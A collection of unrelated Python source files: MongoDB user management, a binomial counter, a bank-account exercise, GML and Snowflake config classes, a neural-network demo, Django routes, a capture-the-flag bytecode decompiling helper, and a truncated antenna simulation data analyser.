self.users.insert_one({'name': self.name,
'cpf': self.cpf,
'email': self.email,
'phone_number': self.phone_number,
'created_at': str(datetime.datetime.now().strftime("%d-%m-%Y")),
'updated_at': str(datetime.datetime.now().strftime("%d-%m-%Y %H:%M:%S"))})
return True
except Exception as erro:
print(str(erro))
return False
def list_all_users(self):
return self.users.find({})
def list_user(self, cpf: str):
return self.users.find({'cpf': crypt(cpf)})
def delete_user(self, cpf: str) -> bool:
try:
db_data = self.list_user(cpf)
user_to_delete = self.generate_data_users(db_data)
user_to_delete['id'] = ObjectId(user_to_delete['id'])
self.users.delete_one({"_id": user_to_delete['id']})
except Exception as erro:
print(str(erro))
return False
return True
def update_user(self, cpf: str, new_user_data: dict) -> bool:
db_data = self.list_user(cpf)
old_user_data = self.generate_data_users(db_data)
new_user_data = self.convert_user_data(new_user_data)
new_user_data['_id'] = ObjectId(old_user_data['id'])
new_user_data['created_at'] = old_user_data['created_at']
new_user_data['updated_at'] = str(datetime.datetime.now().strftime("%d-%m-%Y %H:%M:%S"))
self.users.update_one({"_id": new_user_data['_id']}, {"$set": new_user_data})
return True
def convert_user_data(self, user_data: dict) -> dict:
new_user_data = {'name': crypt(user_data['name']), 'cpf': crypt(user_data['cpf']),
'email': crypt(user_data['email']), 'phone_number': crypt(user_data['phone_number'])}
return new_user_data
def generate_data_users(self, user_data: list) -> dict:
for user in user_data:
user_dict = ({'id': str(user['_id']),
'name': user['name'],
'cpf': user['cpf'],
'email': user['email'],
'phone_number': user['phone_number'],
'created_at': user['created_at'],
'updated_at': user['updated_at']})
return user_dict
|
python
|
binomski_slovar = {(1, 1): 1}
for n in range(2, 101):
for r in range(n + 1):
if r == 0:
binomski_slovar[(n, r)] = 1
elif r == 1:
binomski_slovar[(n, r)] = n
elif r == n:
binomski_slovar[(n, r)] = binomski_slovar[(n - 1, r - 1)]
else:
binomski_slovar[(n, r)] = binomski_slovar[(n - 1, r)] + binomski_slovar[(n - 1, r - 1)]
stevilo_vecjih_od_milijon = sum( map( lambda x: x > 10 ** 6, binomski_slovar.values() ) )
|
python
|
# -*- coding: utf-8 -*-
'''
@Time : 4/20/2022 4:36 PM
@Author : dong.yachao
'''
|
python
|
'''Crie uma classe para implementar uma conta corrente.
A classe deve possuir os seguintes atributos: número da conta,
nome do correntista e saldo. Os métodos são os seguintes:
alterarNome, depósito e saque; No construtor, saldo é opcional,
com valor default zero e os demais atributos são obrigatórios.'''
class ContaCorrente:
def __init__(self, conta="", correntista="", saldo=0):
self.conta = conta
self.correntista = correntista
self.saldo = saldo
def alterar_nome(self, nome):
self.correntista.replace(nome)
return self.correntista
def fazer_deposito(self):
return self.conta
def fazer_saque(self):
return self.saldo
correntista = input('Digite o nome do correntista: ')
conta = int(input("Digite o número da conta: "))
c = ContaCorrente(correntista)
cont = ContaCorrente(conta)
c.alterar_nome("")
cont.fazer_deposito()
|
python
|
from dataclasses import dataclass
from bindings.csw.abstract_coordinate_system_type import AbstractCoordinateSystemType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class ObliqueCartesianCstype(AbstractCoordinateSystemType):
"""A two- or three-dimensional coordinate system with straight axes that
are not necessarily orthogonal.
An ObliqueCartesianCS shall have two or three usesAxis associations.
"""
class Meta:
name = "ObliqueCartesianCSType"
|
python
|
from dataclasses import dataclass, field
from typing import Optional
from serde import deserialize
from metaphor.common.filter import DatasetFilter
from metaphor.snowflake.auth import SnowflakeAuthConfig
from metaphor.snowflake.utils import DEFAULT_THREAD_POOL_SIZE
@deserialize
@dataclass
class SnowflakeRunConfig(SnowflakeAuthConfig):
# Include or exclude specific databases/schemas/tables
filter: Optional[DatasetFilter] = field(default_factory=lambda: DatasetFilter())
# Max number of concurrent queries to database
max_concurrency: Optional[int] = DEFAULT_THREAD_POOL_SIZE
|
python
|
# -*- coding: utf-8 -*-
#####################################################################
# Peach - Python para Inteligência Computacional
# José Alexandre Nalon
#
# Este arquivo: demo07.py
# Demonstração e teste, Mapeamento de uma função não linear.
#####################################################################
from numpy import *
import random
import peach as p
# Explicação deste demo.
#
# É possível utilizar uma rede neural para fazer o mapeamento
# de uma função não linear, como uma senóide ou outra seme-
# lhante. A técnica vai exigir uma rede neural mais complexa,
# com uma entrada, mas com uma camada escondida relativamente
# complexa. A camada de saída deve ter como função de ativação
# a identidade, para somar os mapeamentos realizados.
# Criamos aqui a rede neural. N é a ordem do polinômio,
# que deixamos indicada na forma de uma variável para
# permitir fáceis adaptações. A função de ativação é a
# identidade, e o método de aprendizado é o back-propa-
# gation (por default).
# Utilizamos várias saídas, igualmente distribuídas ao
# redor do ponto de avaliação para que o erro obtido seja
# mais significativo, onde existir. Nesse caso, o ponto de
# avaliação será igual a int(inputs/2). O uso de uma vizi-
# nhança maior possibilitará melhores resultados.
inputs = 7
nn = p.FeedForward((inputs, 200, inputs), lrule=p.BackPropagation(0.01), bias=True)
nn.phi = (p.Sigmoid, p.Linear)
delta = linspace(-0.1, 0.1, inputs)
elog = [ ]
error = 1
i = 0
while i < 2000:
# Geramos um valor de x e um valor da resposta
# desejada. Com x, encontramos xo, que será o
# vetor de entrada da rede neural:
xo = random.uniform(-1.0, 1.0)
x = xo + delta
d = sin(pi*x)
# Fazemos a predição, calculamos o erro e realizamos
# o aprendizado da rede.
y = nn(x)
error = nn.learn(x, d)
elog.append(error)
# Incrementamos o contador de tentativas.
i = i + 1
# Se o sistema tiver o pacote gráfico matplotlib instalado,
# então o demo tenta criar um gráfico da função original,
# contrastada com a função predita. O gráfico é salvo no
# arquivo demo07.eps.
try:
from matplotlib import *
from matplotlib.pylab import *
x = linspace(-1, 1, 200)
y = sin(pi*x)
ye = [ ]
for xo in x:
yn = nn(delta + xo)
ye.append(yn[int(inputs/2)])
ye = array(ye)
subplot(211)
hold(True)
grid(True)
plot(x, y, 'b--')
plot(x, ye, 'g')
xlim([ -1, 1 ])
legend([ "$y$", "$\hat{y}$" ])
subplot(212)
grid(True)
plot(arange(0, 2000, 10), array(elog, dtype=float)[::10])
savefig("demo07.eps")
except ImportError:
pass
|
python
|
from django.conf.urls import url
from .import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^$', views.home_teamlead),
url(r'^index_teamlead$', views.index_teamlead, name='index_teamlead'),
url(r'^holidays_teamlead$', views.holidays_teamlead, name='holidays_teamlead'),
url(r'^attendance_teamlead$', views.attendance_teamlead, name='attendance_teamlead'),
url(r'^salary_teamlead$', views.salary_teamlead, name='salary_teamlead'),
url(r'^salaryview_teamlead$', views.salaryview_teamlead, name='salaryview_teamlead'),
url(r'^profile_teamlead$', views.profile_teamlead, name='profile_teamlead'),
url(r'^editprofile_teamlead$', views.editprofile_teamlead, name='editprofile_teamlead'),
url(r'^compose_teamlead$', views.compose_teamlead, name='compose_teamlead'),
url(r'^changepwd_teamlead$', views.changepwd_teamlead, name='changepwd_teamlead'),
url(r'^leavesRequest_teamlead$', views.leave_teamlead, name='leave_teamlead'),
url(r'^mailview_teamlead$', views.mailview_teamlead, name='mailview_teamlead'),
url(r'^employee_teamlead$', views.employee_teamlead, name='employee_teamlead'),
]
|
python
|
from base64 import b64decode
from zlib import decompress
from os import system
inputFile = "handcrafted-pyc.py_bc552f58fe2709225ca0768c131dd14934a47305"
magicHeader = b"\x03\xf3\x0d\x0a\xfb\x1c\x32\x59"
outputPycFile = "dump.pyc"
outputSrcFile = "output.py"
uncompyleExe = "uncompyle6"
code = 'eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux' \
'+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU' \
'3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMru' \
'ckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2' \
'JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfq' \
'mQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5' \
'HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4A' \
'VAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe' \
'/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ== '
content = decompress(b64decode(code))
file = open(outputPycFile, 'wb')
data = magicHeader + content
file.write(data)
file.close()
system(f"{uncompyleExe} {outputPycFile} > {outputSrcFile}")
def ROT_TWO(_list):
if len(_list) >= 2:
a = _list.pop()
b = _list.pop()
_list.append(a)
_list.append(b)
return _list
def BINARY_ADD(_list):
if len(_list) >= 2:
a = _list.pop()
b = _list.pop()
_list.append(b + a)
return _list
stack = []
for line in open(outputSrcFile):
if "LOAD_CONST" in line:
try:
stack.append(chr(int(line.split()[2])))
except ValueError:
pass
elif "ROT_TWO" in line:
stack = ROT_TWO(stack)
elif "BINARY_ADD" in line:
stack = BINARY_ADD(stack)
print(stack)
|
python
|
import numpy as np
from scipy.signal import find_peaks
import os
import pycst_ctrl
class PyCstDataAnalyser:
""" Used to analyse data exported by CST"""
def __init__(self, opts):
# Initialize attributes
# Polarization indicator
self.pol_ind = opts.get('pol_ind', 'lin_dir')
# Samples in CST farfield data
self.np_theta = opts.get('np_theta', 360)
self.np_phi = opts.get('np_phi', 5)
# Normalization factor for all objective value,
# all object values will be normalized by (goal_val*norm_factor), which represents the relative tolerance
# for each goal. This factor aims to bring multiple types of objective values into same range in
# one cost function.
self.norm_factor = opts.get('norm_factor', 0.1)
# Taper definition in dB
self.taper = opts.get('taper', -12)
# Weight for rotational symmetry evaluation
self.rotsym_goal_val = opts.get('rotsym_goal_val', 0)
self.rotsym_weight = opts.get('rotsym_weight', 0)
# Goal and Weight for cx-pol level evaluation
self.cxlevel_goal_val = opts.get('cxlevel_goal_val', -35)
self.cxlevel_weight = opts.get('cxlevel_weight', 0)
# Goal and Weight for taper angle evaluation
self.taperang_goal_range = opts.get('taperang_goal_range', np.array([10, 24]))
self.taperang_weight = opts.get('taperang_weight', 0)
# Goal and Weight for SLL evaluation
self.sll_goal_val = opts.get('sll_goal_val', -30)
self.sll_weight = opts.get('sll_weight', 0)
# Goal and weight for Farfield AR evaluation
self.ar_ff_goal = opts.get('ar_ff_goal', 0)
# self.ar_ff_max_goal = opts.get('ar_ff_max_goal', 3)
self.ar_ff_mae_weight = opts.get('ar_ff_mae_weight', 0)
self.ar_ff_max_weight = opts.get('ar_ff_max_weight', 0)
# Frequency range within which the S parameters are requested to be evaluated
self.spara_eva_freq_range_vec = opts.get('spara_eva_freq_range_vec', np.array([85, 110]))
# Goal and Weight for S11 evaluation in db value
self.spara_file_name_lst = opts.get('spara_file_name_lst', ['S-Parameters_S1(1),1(1).txt'])
self.spara_goal_lst = opts.get('spara_goal_lst', [-40])
self.spara_mae_weight_lst = opts.get('spara_mae_weight_lst', [0])
self.spara_maxnorm_weight_lst = opts.get('spara_maxnorm_weight_lst', [0])
# Goal and Weight for S11 evaluation in linear value
self.spara_lin_goal_lst = opts.get('spara_lin_goal_lst', [0.01])
self.spara_lin_mae_weight_lst = opts.get('spara_lin_mae_weight_lst', [0])
self.spara_lin_max_weight_lst = opts.get('spara_lin_max_weight_lst', [0])
if len(self.spara_goal_lst) == len(self.spara_file_name_lst):
self.spara_eval_db = True
else:
self.spara_eval_db = False
if len(self.spara_lin_goal_lst) == len(self.spara_file_name_lst):
self.spara_eval_lin = True
else:
self.spara_eval_lin = False
# Frequency range within which the NR AR are requested to be evaluated
self.nf_ar_eva_freq_range_vec = opts.get('nf_ar_eva_freq_range_vec', np.array([85, 110]))
# Goal and Weight for nearfield AR evaluation
self.nf_ar_file_name = opts.get('nf_ar_file_name', 'AR_AllFreq.txt')
self.nf_ar_goal = opts.get('nf_ar_goal', 0)
self.nf_ar_mae_weight = opts.get('nf_ar_mae_weight', 0)
self.nf_ar_maxnorm_weight = opts.get('nf_ar_maxnorm_weight', 0)
@staticmethod
def func_taper_angle_get(theta_vec, dir_co_norm_arr, taper):
index_barr = dir_co_norm_arr >= taper
theta_arr = np.vstack((theta_vec, theta_vec, theta_vec))
theta_arr_tapered = theta_arr[index_barr]
taper_ang = np.amax(np.absolute(theta_arr_tapered))
return taper_ang
@staticmethod
def func_exp_ff_data_proc(export_folder, filename, np_theta, np_phi, pol_ind='RHCP'):
# Get export farfield data file
full_exp_ff_file = os.path.join(export_folder, filename)
# Load data
headerlin = 2
cut_data = np.genfromtxt(full_exp_ff_file, skip_header=headerlin)
# Get Theta (Col.1)
theta_arr = cut_data[:, 0].reshape(np_phi, np_theta)
theta_arr = np.c_[theta_arr, 360 + theta_arr[:, 0]]
theta_vec = theta_arr[0, :]
# Decide data column index for co-pol and cx-pol
if pol_ind == 'LHCP':
co_col_index = 3
cx_col_index = 5
else: # pol_ind = 'RHCP' or 'lin_dir'
co_col_index = 5
cx_col_index = 3
# Get directivity for Co-Pol (Col.4 is LHCP, Col.6 is RHCP or Co-pol if linear direction is chose) for each cut
dir_co_all = cut_data[:, co_col_index].reshape(np_phi, np_theta)
dir_co_arr = dir_co_all[2:5, :]
dir_co_arr = np.c_[dir_co_arr, dir_co_arr[:, 0]]
peak_co_cvec = dir_co_arr[:, np_theta // 2, np.newaxis] # Transform to (3,1) column vector
dir_co_norm_arr = dir_co_arr - peak_co_cvec
# Get directivity for Cx-Pol (Col.4 is LHCP, Col.6 is RHCP or Cx-pol if linear direction is chose) for each cut
dir_cx_all = cut_data[:, cx_col_index].reshape(np_phi, np_theta)
dir_cx_arr = dir_cx_all[2:5, :]
dir_cx_arr = np.c_[dir_cx_arr, dir_cx_arr[:, 0]]
peak_cx_cvec = dir_cx_arr.max(axis=1).reshape(-1, 1)
dir_cx_norm_arr = dir_cx_arr - peak_co_cvec
# Get directivity for Abs (Col.3) for each cut
dir_abs_all = cut_data[:, 2].reshape(np_phi, np_theta)
dir_abs_arr = dir_abs_all[2:5, :]
dir_abs_arr = np.c_[dir_abs_arr, dir_abs_arr[:, 0]]
peak_abs_cvec = dir_abs_arr[:, np_theta // 2, np.newaxis] # Transform to (3,1) column vector
dir_abs_norm_arr = dir_abs_arr - peak_abs_cvec
# Get AR (Col.8) for each cut
ar_all = cut_data[:, 7].reshape(np_phi, np_theta)
ar_arr = ar_all[2:5, :]
ar_arr = np.c_[ar_arr, ar_arr[:, 0]]
ar_boresight_cvec = ar_arr[:, np_theta // 2, np.newaxis] # Transform to (3,1) column vector
return theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
ar_arr, ar_boresight_cvec
def func_rotsym_objval_calc_mse(self, theta_vec, dir_co_norm_arr, taper, goal_val, weight):
"""
This function calculates the weighted MSE between radiation pattern of each cut and average radiation pattern,
the result is a scalar value which represents the rotational symmetry at this frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the taper angle
taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
angle_range = np.array([-taper_ang, taper_ang])
# Get theta vector within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
# Calculate weight for directivity at different theta
radpat_weight_vec = 10 ** ((-1) * (np.absolute(theta_tapered_vec) / taper_ang))
# Calculate MSE between radiation pattern of each cut and average radiation pattern
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
dir_co_norm_tapered_arr = dir_co_norm_arr[index_barr].reshape(-1, len(theta_tapered_vec))
dir_co_norm_avg_tapered_vec = np.mean(dir_co_norm_tapered_arr, axis=0)
# Calculate difference based on array broadcasting
dir_co_sqrdiff_tapered_arr = (dir_co_norm_tapered_arr - dir_co_norm_avg_tapered_vec) ** 2
mse_vec = np.mean(dir_co_sqrdiff_tapered_arr * radpat_weight_vec, axis=1)
# Calculate objective value
objective_val = max(mse_vec.sum() - goal_val, 0)
objective_val *= weight
return objective_val
@staticmethod
def func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, goal_val, weight, norm_factor):
"""
This function calculates the cx-level which is the maximum level of normalized cx-pol among all cuts at one
frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the maximum level of normalized cx-pol among all cuts
cxlevel = np.amax(dir_cx_norm_arr)
# Calculate truncated objective value
objective_val = max((cxlevel - goal_val), 0) / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
def func_taperang_objval_calc_rangetrunc(self, theta_vec, dir_co_norm_arr, taper, goal_range, weight, norm_factor):
"""
This function calculates the truncated difference between simulated taper angle and expected taper angle range
at one frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the max taper angle of the radiation pattern
taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
range_cent = goal_range.mean()
if (taper_ang >= goal_range[0]) and (taper_ang <= goal_range[1]):
objective_val = 0 # Objective is 0 if simulated taper angle is in the expected range
else:
objective_val = abs(taper_ang - range_cent) / (range_cent * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_sll_max_get(dir_co_norm_arr):
"""
This function gets the max SLL of all cuts
"""
cut_num = dir_co_norm_arr.shape[0]
# Initialize an array to store SLL value of each cut
sll_val_vec = np.zeros(cut_num)
for i in range(cut_num):
# Get peaks of each cut
dir_co_norm_cut_vec = dir_co_norm_arr[i, :]
peak_index, properties = find_peaks(dir_co_norm_cut_vec)
peaks = dir_co_norm_cut_vec[peak_index]
# Sort peaks in ascending order
pks_sort = np.sort(peaks)
if 0 == len(pks_sort): # Probably there is no radiation at all due to large reflection coefficient
sll_val_vec[i] = 65535
elif 1 == len(pks_sort):
sll_val_vec[i] = -128 # Set SLL value to a value that will always be lower than the goal
else:
sll_val_vec[i] = pks_sort[-2] # Not always the 1st sidelobe but the highest one
sll_val_max = np.amax(sll_val_vec)
return sll_val_max
def func_sll_objval_calc_trunc(self, dir_co_norm_arr, goal_val, weight, norm_factor):
"""
This function calculates truncated difference between max SLL of all cuts and expected SLL at this frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get max SLL of all cuts
sll_val_max = self.func_sll_max_get(dir_co_norm_arr)
objective_val = max((sll_val_max - goal_val), 0) / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
"""
This function calculates the truncated MAE of AR over given beamwidth (angle range) at one frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get AR array within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
# Get the max AR over the given beamwidth among all cuts
max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
# Calculate the truncated difference simulated AR and expected AR over the given beamwidth
diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
# objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
objective_val = diff_trunc_vec.mean() / (abs(goal_val))
objective_val *= weight
return objective_val
@staticmethod
def func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
"""
This function calculates truncated difference between max AR over given beamwidth for all cuts at one frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get AR array within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
# Get the max AR among all cuts
max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
# Limit the evaluate frequency range
diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
# objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
objective_val = max_diff_trunc / (abs(goal_val))
# objective_val = max_diff_trunc
objective_val *= weight
return objective_val
@staticmethod
def func_cst_spara_data_proc(exp_data_folder, singlerun_data_folder_name, spara_filename):
# Get export S Para data file
full_spara_file = os.path.join(exp_data_folder, singlerun_data_folder_name, spara_filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
s_mag_db = 20 * np.log10(s_mag_lin)
return freq_vec, s_mag_lin, s_mag_db
@staticmethod
def func_meas_spara_data_proc(meas_data_folder, meas_spara_filename):
"""
Process s-parameter data measured by Keysight PNA-X with OML mmWave head
"""
# Get export S Para data file
meas_spara_filepath = os.path.join(meas_data_folder, meas_spara_filename)
# Load data
headerlin = 7
delimiter_str = ","
spara_data = np.genfromtxt(meas_spara_filepath, skip_header=headerlin, delimiter=delimiter_str)
# Parses data
freq_vec = spara_data[:, 0] / 1e9 # Convert to GHz
s_mag_db = spara_data[:, 1]
s_ph_deg = spara_data[:, 2]
return freq_vec, s_mag_db, s_ph_deg
@staticmethod
def func_spara_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_spara_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_spara_lin_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
# s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
objective_val = diff_trunc_vec.mean()
objective_val *= weight
return objective_val
@staticmethod
def func_spara_lin_objval_calc_maxtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
# s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
objective_val = max_diff_trunc
objective_val *= weight
return objective_val
@staticmethod
def func_nf_ar_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_nr_ar_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
# Parses data
freq_vec = nf_ar_data[:, 0]
nf_ar_real = nf_ar_data[:, 1]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
objective_val = diff_trunc_vec.mean()
objective_val *= weight
return objective_val
@staticmethod
def func_nf_ar_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_nr_ar_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
# Parses data
freq_vec = nf_ar_data[:, 0]
nf_ar_real = nf_ar_data[:, 1]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
objective_val = max_diff_trunc / (abs(goal_val) / 2)
objective_val *= weight
return objective_val
@staticmethod
def func_spara_data_sample_extract(export_folder, filename, freq_limit_vec, sample_num):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
# s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_limit_vec[0], freq_vec <= freq_limit_vec[1])
freq_range_vec = freq_vec[index_bvec]
s_mag_range_lin_vec = s_mag_lin[index_bvec]
# Get the samples from the data within the range
data_num = len(s_mag_range_lin_vec) # data points including the first and last points
# Generate sample index between the first index (0) and the last index (data_num -1) (include last index)
sample_index = np.linspace(0, data_num - 1, sample_num).astype(int) # Cast the sample index to integer
freq_sample_vec = freq_range_vec[sample_index]
s_mag_lin_sample_vec = s_mag_range_lin_vec[sample_index]
return freq_sample_vec, s_mag_lin_sample_vec
def func_cst_data_spara_analyse(self, singlerun_export_folder):
# Evaluate S parameters
spara_objval_vec = np.array([])
spara_eva_freq_range_vec = self.spara_eva_freq_range_vec
for i in range(len(self.spara_file_name_lst)):
spara_file_name = self.spara_file_name_lst[i]
if self.spara_eval_db is True: # if configuration is valid
# Goal and weight for spara in db values
spara_goal_val = self.spara_goal_lst[i]
spara_mae_weight = self.spara_mae_weight_lst[i]
spara_maxnorm_weight = self.spara_maxnorm_weight_lst[i]
if spara_mae_weight != 0:
spara_objval_mae = self.func_spara_objval_calc_maetrunc(singlerun_export_folder, spara_file_name,
spara_goal_val, spara_eva_freq_range_vec,
spara_mae_weight, self.norm_factor)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_objval_mae)
if spara_maxnorm_weight != 0:
spara_objval_max = self.func_spara_objval_calc_maxnormtrunc(singlerun_export_folder,
spara_file_name, spara_goal_val,
spara_eva_freq_range_vec,
spara_maxnorm_weight, self.norm_factor)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_objval_max)
if self.spara_eval_lin is True:
# Goal and weight for spara in linear values
spara_lin_goal_val = self.spara_lin_goal_lst[i]
spara_lin_mae_weight = self.spara_lin_mae_weight_lst[i]
spara_lin_max_weight = self.spara_lin_max_weight_lst[i]
if spara_lin_mae_weight != 0:
spara_lin_objval_mae = self.func_spara_lin_objval_calc_maetrunc(singlerun_export_folder,
spara_file_name, spara_lin_goal_val,
spara_eva_freq_range_vec,
spara_lin_mae_weight)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_mae)
if spara_lin_max_weight != 0:
spara_lin_objval_max = self.func_spara_lin_objval_calc_maxtrunc(singlerun_export_folder,
spara_file_name, spara_lin_goal_val,
spara_eva_freq_range_vec,
spara_lin_max_weight)
# Form s-para objective value list
